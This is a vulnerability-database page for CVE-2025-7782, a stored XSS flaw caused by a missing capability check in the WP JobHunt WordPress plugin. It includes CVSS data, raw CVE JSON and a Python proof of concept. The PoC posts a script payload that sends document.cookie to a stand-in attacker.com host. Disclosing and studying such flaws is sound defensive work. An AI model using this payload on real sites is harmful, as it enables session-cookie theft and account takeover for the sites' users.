Security Vulnerability Report
中文
CVE-2025-7782 CVSS 7.6 HIGH

CVE-2025-7782

Published: 2025-12-20 14:16:04
Last Modified: 2026-04-15 00:35:42

Description

The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to unauthorized modification of data due to a missing capability check on the 'cs_update_application_status_callback' function in all versions up to, and including, 7.7. This makes it possible for authenticated attackers, with Candidate-level access and above, to inject cross-site scripting into the 'status' parameter of applied jobs for any user.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP JobHunt plugin <= 7.7
JobCareer WordPress Theme (bundled JobHunt)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-7782 PoC - Stored XSS via status parameter # Target: WordPress with JobHunt plugin <= 7.7 target_url = "http://target-wordpress-site.com" wp_admin_ajax = f"{target_url}/wp-admin/admin-ajax.php" # XSS payload for stealing cookies xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>' # Prepare the malicious request data = { 'action': 'cs_update_application_status_callback', 'post_id': '123', # Target job posting ID 'status': xss_payload, # XSS injection point 'candidate_id': '456' # Target candidate ID } # Send the exploit request (requires Candidate-level auth) response = requests.post(wp_admin_ajax, data=data, timeout=10) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Note: Attacker needs valid WordPress session with Candidate role

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7782", "sourceIdentifier": "[email protected]", "published": "2025-12-20T14:16:03.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to unauthorized modification of data due to a missing capability check on the 'cs_update_application_status_callback' function in all versions up to, and including, 7.7. This makes it possible for authenticated attackers, with Candidate-level access and above, to inject cross-site scripting into the 'status' parameter of applied jobs for any user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/af063570-43f7-4bf4-850c-21c3bff40ac1?source=cve", "source": "[email protected]"}]}}